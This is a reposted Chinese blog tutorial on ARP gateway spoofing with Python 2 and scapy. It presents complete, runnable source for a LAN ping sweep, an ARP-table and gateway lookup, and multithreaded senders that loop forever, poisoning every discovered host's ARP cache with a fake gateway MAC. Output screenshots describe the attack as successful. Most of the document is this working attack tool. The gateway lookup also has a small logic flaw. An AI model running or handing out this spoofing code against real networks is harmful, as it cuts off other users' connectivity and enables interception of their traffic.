2. 程式人生 > >Python利用scapy實現ARP欺騙

Python利用scapy實現ARP欺騙

阿新 發佈:2018-12-24

一、實驗原理。    

    本次用程式碼實現的是ARP閘道器欺騙,通過傳送錯誤的閘道器對映關係導致區域網內其他主機無法正常路由。使用scapy中scapy.all模組的ARP、sendp、Ether等函式完成包的封裝與傳送。一個簡單的ARP響應報文傳送:

eth = Ether(src=src_mac, dst=dst_mac)#賦值src_mac時需要注意,引數為字串型別
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)#src為源,dst為目標,op=2為響應報文、1為請求
pkt = eth / arp
endp(pkt)
    因為實驗時發現主機並不會記錄來自閘道器的免費ARP報文,無奈只有先想辦法把區域網記憶體在的主機的IP-MAC對映關係拿到手,再逐個傳送定向的ARP響應報文。


二、執行結果。

    <1>先檢視閘道器,確保有網:


    <2>因為socket需要sudo許可權,所以以root許可權跑起來:


    <3>因為程式碼寫的比較繁瑣,跑起來就比現場的工具慢很多,最後看下區域網內主機的arp表:


閘道器172.16.0.254的MAC地址已經從00:05:66:00:29:69變成01:02:03:04:05:06,成功!


三、實現程式碼。

    程式碼過程:載入閘道器->掃描區域網內主機->掃描完成->載入arp表->傳送ARP響應報文。

    如圖,程式碼分為六個部分。其中的arpATC.py為主程式,pingScanner.py為主機掃描器,arpThread.py為掃描執行緒,atcThread.py為發包執行緒,gtwaySearch.py獲取閘道器,macSearch.py讀取本機arp表。

    <1>pingScanner.py

    通過os.popen函式呼叫ping,使用正則匹配返回字串判斷目標主機是否存在。

#!/usr/bin/python
'''
Using ping to scan
'''
import os
import re
import time
import thread

def host_scanner(ip):
    p = os.popen('ping -c 2 '+ip)
    string = p.read()
    pattern = 'Destination Host Unreachable'
    if re.search(pattern,string) is not None:
        print '[*]From '+ip+':Destination Host Unreachable!'+time.asctime( time.localtime(time.time()) )
        return False
    else:
        print '[-]From '+ip+':Recived 64 bytes!'+time.asctime( time.localtime(time.time()) )
        return True

if __name__=='__main__':
    print 'This script is only use as model,function:scanner(ip)!'

    <2>macSearch.py

    同樣,呼叫os.popen函式帶入引數'arp -a'檢視本地快取的arp表資訊。通過正則表示式擷取每個IP對應的MAC地址,儲存在字典arp_table裡並返回。

#!/usr/bin/python
'''
Using re to get arp table
arp -a
? (192.168.43.1) at c0:ee:fb:d1:cd:ce [ether] on wlp4s0
'''
import re
import os
import time

def getMac(ip_table=[],arp_table={}):
    #print '[-]Loading ARP table...'+time.asctime( time.localtime(time.time()) )
    p = os.popen('arp -a')
    string = p.read()
    string = string.split('\n')
    pattern = '(\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3})(.\s*at\s*)([a-z0-9]{2}\:[a-z0-9]{2}\:[a-z0-9]{2}\:[a-z0-9]{2}\:[a-z0-9]{2}\:[a-z0-9]{2})'
    length = len(string)
    for i in range(length):
        if string[i] == '':
            continue
        result = re.search(pattern, string[i])
        if result is not None:
            ip = result.group(1)
            mac = result.group(3)
            arp_table[ip]=mac
            ip_table.append(ip)
        #else:
            #print '[*]macSearch.getMac:result is None'
    #print '[-]ARP table ready!'+'<->'+time.asctime( time.localtime(time.time()) )
    return (ip_table,arp_table)

if __name__=='__main__':
    table = getMac()
    ip_table = table[0]
    arp_table = table[1]
    for i in range(len(ip_table)):
        ip = ip_table[i]
        print '[-]'+ip+'<-is located on->'+arp_table[ip]

    <3>gtwaySearch.py

    通過使用正則擷取os.popen('route -n')的返回值確定閘道器IP,把獲取的閘道器IP與MAC當作元組返回。

#!/usr/bin/python
'''
'Kernel IP routing table\nDestination     Gateway         Genmask         Flags Metric Ref    Use Iface\n
0.0.0.0         172.16.0.254    0.0.0.0         UG    100    0        0 enp3s0f1\n
172.16.0.0      0.0.0.0         255.255.255.0   U     100    0        0 enp3s0f1\n'

'''

import re
import os
import time
from macSearch import *

def find_Gateway():
    p = os.popen('route -n')
    route_table = p.read()
    pattern = '(0\.0\.0\.0)(\s+)((\d+\.){1,3}(\d+))(\s+)(0\.0\.0\.0)'
    result = re.search(pattern, route_table)
    if result is not None:
        #print '[-]Gateway is located on:' + result.group(3)+'...'+time.asctime( time.localtime(time.time()) )
        table = getMac()
        ip = table[0][0]
        mac = table[1][ip]
        return (ip,mac)
    else:
        #print '[*]arpATC.find_Gateway:result is None!'
        #print '[*]Gateway is no found!'
        return

if __name__=='__main__':
    print '[-]Looking for Gateway...'+time.asctime( time.localtime(time.time()) )
    gateway = find_Gateway()
    if gateway is not None:
        print '[-]Gateway is located on:' + gateway[0]+'('+gateway[1]+')'+'...'+time.asctime( time.localtime(time.time()))
    else:
        print '[*]Gateway is no found!'+gateway[0]+time.asctime( time.localtime(time.time()) )

    <4>arpThread.py

    考慮到ping掃描主機時遇到不存在的主機會等待過長的時間,使用多執行緒掃描就稍微會快一點。這裡是通過繼承、重寫run方法實現功能的。因為不太會控制多執行緒,所以這裡寫死了,是四個執行緒平分255個可能存在的主機。

#/usr/bin/python

import threading
import time
from gtwaySearch import *
from macSearch import *
from pingScaner import *

class arpThread(threading.Thread):
    def __init__(self,tag_ip,number):
        super(arpThread,self).__init__()
        self.tag_ip = tag_ip
        self.number = number
        self.status = False

    def run(self):
        add = 0
        if (self.number-1)==0:
            add = 1
        start = (self.number-1)*64 + add
        #1-63,64-127,128-191,192-256
        end = start + 64
        for i in range(start, end):
            if i < 255:
                host = self.tag_ip.split('.')
                host[3] = str(i)
                host = '.'.join(host)
                host_scanner(host)
        self.status=True
        print '[-]Status of Thread_%d is '%self.number+str(self.status)

        #print '[-]Scan completed!' + time.asctime(time.localtime(time.time()))

    <5>atcThread.py

    使用與arpThread.py中類似的方法繼承、重寫run方法實現多執行緒發包的功能。發包時源IP是指定的字串“01:02:03:04:05:06”,源IP為獲取的閘道器IP,目標IP和目標MAC皆為從本機arp表中獲取的真實存在的主機IP與MAC。

#!/usr/bin/python

import threading
from scapy.all import ARP,Ether,sendp,fuzz,send

class atcThread(threading.Thread):
    def __init__(self,table,gtw_ip,gtw_mac):
        super(atcThread,self).__init__()
        self.table = table
        self.gtw_ip = gtw_ip
        self.gtw_mac = gtw_mac

    def run(self):
        ip_table = self.table[0]
        arp_table = self.table[1]
        while True:
            for i in range(len(ip_table)):
                tag_ip = ip_table[i]
                tag_mac = arp_table[tag_ip]
                eth = Ether(src=self.gtw_mac, dst=tag_mac)
                arp = ARP(hwsrc='01:02:03:04:05:06', psrc=self.gtw_ip, hwdst=tag_mac, pdst=tag_ip, op=2)
                pkt = eth / arp
                sendp(pkt)

                #pkt = eth/fuzz(arp)
                #send(pkt,loop=1)

    <6>arpATC.py

    程式碼的主程式,程式碼過程:

    載入閘道器->掃描區域網內主機->掃描完成->載入arp表->傳送ARP響應報文->等待。

                            (四執行緒)                                                                     (四執行緒)

    因為主程式是死迴圈,所以即便是攻擊完成後也不會退出。可以在arpThread啟動前加入for迴圈,這樣就能無限傳送了。

#!/usr/bin/python
'''

'''
import os
from gtwaySearch import *
from arpThread import arpThread
from atcThread import atcThread

def atc_WrongGTW(gtw):
    src_ip = gtw[0]
    src_mac = gtw[1]
    print '[-]Start scanning hosts...' + time.asctime(time.localtime(time.time()))
    arpThread_1 = arpThread(src_ip,1)
    arpThread_2 = arpThread(src_ip,2)
    arpThread_3 = arpThread(src_ip,3)
    arpThread_4 = arpThread(src_ip,4)

    arpThread_1.start()
    arpThread_2.start()
    arpThread_3.start()
    arpThread_4.start()
    t = False
    while(t==False):
        t = arpThread_1.status and arpThread_2.status and arpThread_3.status and arpThread_4.status
        time.sleep(5)
    table = getMac()
    print '[-]Scan completed!' + time.asctime(time.localtime(time.time()))
    flag = raw_input('[-]Ready to start attacking:(y/n)')
    while(True):
        if flag in ['y', 'Y', 'n', 'N']:
            break
        print "[*]Plz enter 'y' or 'n'!"
        flag = raw_input()
    if flag in ['n','N']:
        print '[*]Script stopped!'
    else:
        atcThread_1 = atcThread(table,src_ip,src_mac)
        atcThread_2 = atcThread(table,src_ip, src_mac)
        atcThread_3 = atcThread(table,src_ip, src_mac)
        atcThread_4 = atcThread(table,src_ip, src_mac)
        os.popen('arp -s %s %s'%(src_ip,src_mac))
        print '[-]'+'arp -s %s %s'%(src_ip,src_mac)
        print '[-]Strat attack...'
        atcThread_1.start()
        atcThread_2.start()
        atcThread_3.start()
        atcThread_4.start()



if __name__=='__main__':
    gateway = find_Gateway()
    if gateway is not None:
        atc_WrongGTW(gateway)
        while True:
            pass
    else:
        print "[*]Can't find Gateway!"






相關推薦

Python利用scapy實現ARP欺騙

一、實驗原理。         本次用程式碼實現的是ARP閘道器欺騙,通過傳送錯誤的閘道器對映關係導致區域網內其他主機無法正常路由。使用scapy中scapy.all模組的ARP、sendp、Ether等函式完成包的封裝與傳

Python學習--利用scapy實現ARP欺騙

一、本次測試的實驗環境:   kali(受害機):     ip:10.10.10.129        win2003(受害機): ip:10.10.10.130   閘道器           ip:10.10.10.2  

Python 利用socket 實現 ssh 跳轉

socket python squid 1.場景描述:主機A主機B主機C10.13.170.76172.28.117.156(squid)10.95.113.131 主機A---->主機B(80)--->主機C(22), A通過B的80訪問主機C131 2.Python代碼;im

基於Winpcap實現ARP欺騙

事件起因 某小夥伴太熱衷於瀏覽新聞看網頁,常常忘了自己手中的事情,於是做了這個小程式挑逗了一下 實現過程 ARP欺騙有分為2個方向,欺騙閘道器與欺騙被挑逗者,核心為偽造ARP Reply報文,更新目標主機的ARP快取表,我這裡選擇了攻擊被挑逗者,偽造閘道器向被攻擊者發生

python利用paramiko實現ssh連線及遠端執行命令

python3.6, windows下 1,安裝paramiko模組 依賴cryptography:使用命令easy_install安裝該模組時,如果報錯“...microsoft visual c++ 14.0 is required.”, 可以下載.whl檔案,使用命令pip instal

python-利用生成器實現併發

1.建立一個生成器: next和send都可以使生成器物件輸出。 區別在send可以傳值。 def create_num(all_num): print('-----1-------') a, b = 0, 1 current_num = 0 while

Python利用APScheduler實現定時任務框架

APScheduler是一款功能非常強大的定時任務框架。利用APScheduler框架我們可以很方便實現一個基於Python的定時任務系統 1,安裝 pip install apscheduler 2,簡單呼叫(一次性呼叫任務) from apscheduler.sc

python利用numpy實現結構體

在C語言中我們可以通過struct關鍵字定義結構型別,結構中的欄位佔據連續的記憶體空間,每個結構體佔用的記憶體大小都相同,因此可以很容易地定義結構陣列。和C語言一樣,在NumPy中也很容易對這種結構陣列進行操作。只要NumPy中的結構定義和C語言中的定義相同,NumPy就

Python利用heapq實現一個優先順序佇列

實現一個優先順序佇列,每次pop的元素要是優先順序高的元素,由於heapq.heapify(list)預設構建一個小頂堆,因此要將priority變為相反數再push,程式碼如下: import he

原始套接字實現--arp欺騙

1、利用原始套接字實現arp欺騙:       首先我們要清楚arp的原理: 這樣我們就可以很清楚我們要做什麼了: 2、既然這樣我們就可以十分明白自己該怎樣做了。   來看一下linux下的一些對於arp頭部的構造的原始碼和各個欄位的常見引數解析:去檔案/usr/

python-利用senleium實現定時重啟路由器

color 重啟 pin start exception starting datetime man import from selenium import webdriver import time #from datetime import * #import sen

利用Python&ARP欺騙抓圖片!回首掏,哎就是封不了我的IP!難受

選擇kali支援的無線網絡卡可參考連結:http://www.freebuf.com/articles/wireless/140065.html 不過要注意一點,wn722n型號的無線網絡卡只有v1才支援kali,現在網上大多數賣的都是v2的,如果選擇這一款買的時候

python利用企業微信api來進行發送自定義報警的類實現

python 微信報警python利用企業微信api來進行發送自定義報警的類實現企業微信註冊打開http://work.weixin.qq.com/企業微信主頁;點擊企業註冊;填寫相關信息,營業執照和註冊號可以不用填,直接下一步,按照提示操作即可;註冊完成後,登陸,就顯示如下界面:點擊我的企業標簽:看到如上界

Python與數據庫[2] -> 關系對象映射/ORM -> 利用 sqlalchemy 實現關系表查詢功能

none 標準 ica accounts like imp 函數 參數形式 char 利用 sqlalchemy 實現關系表查詢功能 下面的例子將完成一個通過關系表進行查詢的功能,示例中的數據表均在MySQL中建立,建立過程可以使用 SQL 命令或編寫 Python

ARP欺騙利用ARP協議本身的哪些機制

       筆者在之前的文章中已經寫過了,ARP協議是主機A在瞭解了主機B的IP地址的前提下,對B發起詢問的協議(雖然它叫地址解析協議),但是這裡有一個問題,由於IP是動態分配(之後寫DHCP協議的時候會提到),那麼對於一個動態分配的IP

python利用定義類實現迭代器協議

1.具有__ next__和__ iter__方法的物件即被視為迭代器,其中next方法每執行一次返回迭代的下一項,而iter方法可以把物件變成迭代器. 執行for迴圈的本質即是先對物件使用iter方法, 然後不斷使用next方法,直到報出StopIteration. 故可直接在類中定義這兩

python利用flas框架完成區塊鏈小demo(實現轉賬,節點更新)

還是迫於老闆的壓力下 從網上看了尹成老師關於對區塊鏈的教程 模仿用python寫了個小demo 這注釋也花了我不少時間 import hashlib # 資訊保安加密 import json import time from urllib.parse import urlparse #網路編

Python基礎程式設計:利用列表實現簡單的先進後出、先進先出

i = []#定義空白列表 def push(a):#定義增加函式 i.append(a) def view():#定義列印函式 print(i) while True: print('請輸入你的操作:') print('push:u')#增加元素 print

利用Python requests庫實現cas認證

1.準備工作-背景知識 1.1 requests庫簡介: python有很多可以用來測試介面的模組,個人覺得,requests庫是最好用的, 在Robot Framwork裡,它的測試庫requestsLibrary,也是基於requests寫的。 1.1.1 安裝: 作為第三方模組,使用前,需要安裝,最簡單

python利用Trie(字首樹)實現搜尋引擎中關鍵字輸入提示(學習Hash Trie和Double-array Trie)

python利用Trie(字首樹)實現搜尋引擎中關鍵字輸入提示(學習Hash Trie和Double-array Trie)  主要包括兩部分內容:(1)利用python中的dict實現Trie;(2)按照darts-java的方法做python的實現Double-array Trie比較:(1)